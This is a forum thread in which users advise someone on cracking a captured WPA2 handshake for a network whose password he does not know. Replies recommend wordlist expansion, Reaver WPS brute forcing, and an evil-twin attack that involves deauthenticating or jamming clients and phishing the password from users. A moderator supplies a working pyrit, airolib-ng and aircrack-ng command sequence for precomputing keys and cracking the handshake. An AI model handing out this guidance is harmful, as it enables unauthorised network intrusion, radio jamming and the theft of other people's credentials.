WPA/WPA2 PSK Brute Forcing Dictionary Files

What's the best way to setup a home network? Why should I care about BGP?

WPA/WPA2 PSK Brute Forcing Dictionary Files

Post by CaptianMadJacks on Sun Oct 20, 2013 8:24 pm
([msg=77780]see WPA/WPA2 PSK Brute Forcing Dictionary Files[/msg])

So I've been working on this problem for quite some time. I'm trying to brute force a WPA2 handshake using a CCMP cipher from a .cap obtained from my router using airodump-ng, and I am positive that I captured the correct handshake. Where I am stuck is at brute forcing the password out of the .CAP file. I have access to a whole lot of processing power and have processed the entire 14 GB dictionary file I found online (took about two days ago), but no luck on cracking the WPA handshake to get the PSK. I was trying to get my hands on the Church of Wi-Fi's 33 gig dictionary file but it appears at their website isn't functioning properly, and the torrent that they set up for the 33 gig file was hosted by ISO Hunt, which is no longer available; that may have to do with ISO Hunt's current legal troubles.

I've also been trying out different cracking tools. I originally started out trying with aircrack-ng, but I've just switched my brute forcing attack program to using pyrit. Aircrack-ng appears to have better speed when cracking passwords but maybe I'm just using pyrit incorrectly. Does anyone have a preference between the two, or have found a better brute forcing program?

Main questions
• Any advice on finding a new password dictionary file, or locating a copy of the Church of Wi-Fi's file online somewhere. (And yes I'm aware of Google and have been using it)
• Any suggestions on brute forcing programs.
• Is there something I'm missing here?
CaptianMadJacks
New User
New User
 
Posts: 3
Joined: Sun Oct 20, 2013 6:15 pm
Blog: View Blog (0)


Re: WPA/WPA2 PSK Brute Forcing Dictionary Files

Post by WallShadow on Sun Oct 20, 2013 10:17 pm
([msg=77783]see Re: WPA/WPA2 PSK Brute Forcing Dictionary Files[/msg])

1. password dictionaries aren't the only thing you could use. you can use pre-computed rainbow tables to attack the encryption. see if you can't find any rainbow tables for WPA(2) passwords (possibly pre-computed airbase database, or various other rainbow table files).
2. get your existing password files and pass them through john the ripper to generate many more passwords. with default settings, it will probably expand your 14 gb file to 100 gb or more
3. try using reaver. it's a brute forcing tool which attacks WPS on WPA(2) routers. it can take some time, perhaps even days, but it will eventually break it if it has WPS enabled.
4. perform an evil-twin attack against the network (might need to dc users or even jam the frequency to get it to work), and solicit the password from any stupid users.

<3
User avatar
WallShadow
Contributor
Contributor
 
Posts: 614
Joined: Tue Mar 06, 2012 9:37 pm
Blog: View Blog (0)


Re: WPA/WPA2 PSK Brute Forcing Dictionary Files

Post by FlyingWarrior on Sun Oct 20, 2013 10:22 pm
([msg=77784]see Re: WPA/WPA2 PSK Brute Forcing Dictionary Files[/msg])

I personally use aircrack-ng, as you already stated the speed on password cracking seems to be a lot better then other programs out there, especially when tied into a computer with decent processing power.

As for a dictionary file I tend to formulate my own for different situations. I have several "fast" files that quickly scans thru common passwords if you need to attempt to crack something under a time constraint. I several other files specific to certain attacks full of possible passwords that have a more intimate involvement with the attack I am initiating. Then finally I have the "phonebook" file of every possible password from the other attacks along with an enormous amount of possible permutations of a given password, for when time is not of the essence.

I recommend you just experiment playing around creating a few different files for any given situation.

and if I come across the Church of Wi-Fi's file I will make sure to PM you, personally I wouldn't mind adding it to my collection as well.
FlyingWarrior
New User
New User
 
Posts: 4
Joined: Tue Sep 24, 2013 2:46 pm
Blog: View Blog (0)


Re: WPA/WPA2 PSK Brute Forcing Dictionary Files

Post by CaptianMadJacks on Tue Oct 22, 2013 9:44 pm
([msg=77837]see Re: WPA/WPA2 PSK Brute Forcing Dictionary Files[/msg])

Whileshadow, Great advice. I originally started this using Reaver and when at for weeks but with no luck, and I've read everything I can get my hands on online. As I understand it Reaver can take a long time to get a feel for, and results very from router from router (depending on make and model).The evil twin attack is genius I haven't thought of using that method this way before. Do you think using mdk3 utility for sending the authentication broadcasts repeatedly will work for jamming?

I do know some characteristics of the password. Such as its 16 characters long and made up of a random set of numbers and just capital letters, no lowercase alphabet. I've heard 16 character passwords are somewhere near impossible to crack, any thoughts on how long it might take or if it's even possible (without taking 10 years).
CaptianMadJacks
New User
New User
 
Posts: 3
Joined: Sun Oct 20, 2013 6:15 pm
Blog: View Blog (0)


Re: WPA/WPA2 PSK Brute Forcing Dictionary Files

Post by limdis on Wed Oct 23, 2013 11:29 am
([msg=77845]see Re: WPA/WPA2 PSK Brute Forcing Dictionary Files[/msg])

Hmm hmm. Double check to ensure you have a complete 4 way handshake. You mentioned using pyrit so run this and tell us what you see.

Code: Select all
pyrit -r <.cap file> analyze


As for you crack speeds, yes aircrack-ng is faster than pyrit (and cowpatty) running simple cracks. If you want to get some serious speed running your dictionaries (800k+/s) you need to create your own rainbow table with precomputed pairwise master keys (PMKs). Before I confuse you let me explain:

When you run aircrack-ng you will notice the output is broken into 3 parts; the first two are the main parts to focus on. The "Master Key" is the pairwise master key. It is derived from the ESSID using the pbkdf2 algorithm. Basically, it takes a long ass time to compute. This is the very reason it takes so long to crack WPA(2) encryptions.

The basic process:
Word from dictionary + encryption algorithm > PMK > Private Transient Key (PTK, aka: the password) > plain text password

This has to be done for every single entry in your dictionary. Now, what I mentioned before. The PMKs are always the same so why waste the time in computing them for every single entry if you don't have to? There is one downside to this method that you should know. Precomputing a PMK from your dictionaries and saving them to a table is a VERY slow process. However, once it is done it is done. That said, this rainbow table will only work on handshakes that were captured with the same ESSID that you used. To the blackhats out there this will waste your time.

Code: Select all
# echo <ESSID> > targetessid.txt
# airolib-ng <database name> --import essid targetessid.txt
# airolib-ng <database name> --import passwd <wordlist>
# airolib-ng <database name> --batch
# airolib-ng <database name> --stats (ensure 100%)
# aircrack-ng -r <database name> <.cap>


But, I got side tracked. Tell us if you have a genuine 4way first.
"The quieter you become, the more you are able to hear..."
"Drink all the booze, hack all the things."
User avatar
limdis
Moderator
Moderator
 
Posts: 1414
Joined: Mon Jun 28, 2010 5:45 pm
Blog: View Blog (0)



Return to Networking

Who is online

Users browsing this forum: No registered users and 0 guests